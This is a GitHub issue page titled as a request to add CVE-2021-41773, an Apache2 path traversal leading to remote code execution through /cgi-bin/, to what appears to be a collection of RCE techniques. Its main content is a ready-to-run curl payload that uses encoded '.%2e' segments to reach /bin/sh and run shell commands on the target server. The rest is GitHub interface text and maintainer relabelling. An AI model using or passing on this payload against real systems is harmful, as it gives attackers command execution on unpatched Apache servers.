Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/ #10

Open
wlayzz opened this issue Jun 26, 2022 · 0 comments
Open

[add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/ #10

wlayzz opened this issue Jun 26, 2022 · 0 comments
Assignees
@p0dalirius
Labels
add-request Request a new RCE technique

Comments

@wlayzz
Copy link
Contributor

wlayzz commented Jun 26, 2022

Adding rce technique on apache2, payload:
curl "http://url.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" --data 'echo Content-Type: text/plain; echo; mkdir /tmp/poda/'
@p0dalirius p0dalirius self-assigned this Jun 26, 2022
@p0dalirius p0dalirius added the add-request Request a new RCE technique label Jun 26, 2022
@p0dalirius p0dalirius changed the title Improvement: Add CVE-2021-41773 on Apache2 [Enhancement]: Add CVE-2021-41773 on Apache2 Jul 4, 2022
@p0dalirius p0dalirius changed the title [Enhancement]: Add CVE-2021-41773 on Apache2 [add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/ Aug 24, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@p0dalirius p0dalirius

Labels
add-request Request a new RCE technique
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@wlayzz @p0dalirius